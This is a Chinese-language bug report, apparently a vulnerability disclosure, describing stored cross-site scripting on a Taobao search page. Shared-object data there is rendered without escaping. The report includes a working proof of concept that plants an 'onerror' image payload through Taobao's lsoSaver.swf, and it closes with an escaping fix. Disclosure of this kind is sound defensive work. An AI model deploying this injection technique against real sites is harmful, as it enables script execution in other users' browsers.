未对输出进行过滤
http://list.taobao.com/itemlist/default.htm
搜索页中有一个最近浏览商品的栏目,
从 flash 的 shared object 中取出数据后直接展现,未进行过滤,如果 shared object 中存在恶意数据,会造成 xss.
[code ]<script>
// PoC callback invoked by the embedded lsoSaver.swf (status presumably comes in
// through Flash ExternalInterface — type not confirmed here, so the loose
// comparison against 2 is kept on purpose).
// When the status is 2 it stores a crafted "recently viewed items" record in the
// Flash shared object. The record follows the page's own storage format; the only
// unusual part is the "pic" field, which is what the unescaped render site on the
// search page turns into script execution. The fix belongs at that render site
// (escape before output), not in this storage step.
function updateLsoSaverStatus(status) {
  if (status != 2) {
    return;
  }
  var storageKey = 'tb_recent_viewed_items';
  var record = '[{"itemId":"16023262435","pic":"i1%2FT1o4T0Xn4hXXbdPVbb_122616.jpg%22><img src=2 onerror=alert(document.domain)>","price":"15800","title":"%E9%A1%BA%E8%BE%BE%E9%93%B6%E9%B2%B8%E7%81%B5%E6%B6%A6%E9%AB%98%E5%8E%8B%E9%94%85%E5%A4%8D%E5%BA%95%E4%B8%8D%E9%94%88%E9%92%A2%E5%8E%8B%E5%8A%9B%E9%94%85%2024cm%20%E8%B6%85%E5%8E%9A%E9%AB%98%E5%8E%8B%E9%94%85SDF-9624","isDaily":false},{"url":"http%3A%2F%2Fitem.taobao.com%2Fitem.htm%3Fid%3D15621327776","itemId":"15621327776","xid":"","pic":"i2%2FT1q1iGXkpzXXbDQSTb_094946.jpg","price":"8900","itemIdStr":"15621327776","title":"%E4%B8%93%E6%9F%9C%E6%AD%A3%E5%93%81%20%E9%A1%BA%E8%BE%BE20CM%20%E7%BB%84%E5%90%88%E7%9B%96%E5%A4%8D%E5%BA%95%E6%97%A5%E5%BC%8F%E8%92%B8%E9%94%85SDF-8121%E4%B8%8D%E9%94%88%E9%92%A2%E8%92%B8%E7%85%AE%E9%94%85","isDaily":false}]';
  // Named <object>/<embed> elements are reachable as document properties in browsers.
  document.J_lsoSaver.save(storageKey, record);
}
</script>
Taobao xss poc
<!-- PoC loader: embeds Taobao's own lsoSaver.swf so the script above can call
     its save() method. allowScriptAccess="always" on both the <param> and the
     <embed> grants the SWF script access to the embedding page; presumably that
     is how the updateLsoSaverStatus callback gets invoked (not confirmed here).
     Note for defenders: the shared object is client-side storage under the
     visitor's control, so nothing read from it can be trusted at render time. -->
<object id="J_lsoSaver" tabindex="-1" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
<param name="movie" value="http://a.tbcdn.cn/app/tbskip/lsoSaver.swf">
<param name="allowScriptAccess" value="always">
<embed name="J_lsoSaver" src="http://a.tbcdn.cn/app/tbskip/lsoSaver.swf" width="1" height="1" allowscriptaccess="always" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer">
</object>[/code]
修复方案:
对从 shared object 读出的数据在输出到页面前进行 HTML 转义(输出过滤),不要信任客户端存储中的内容.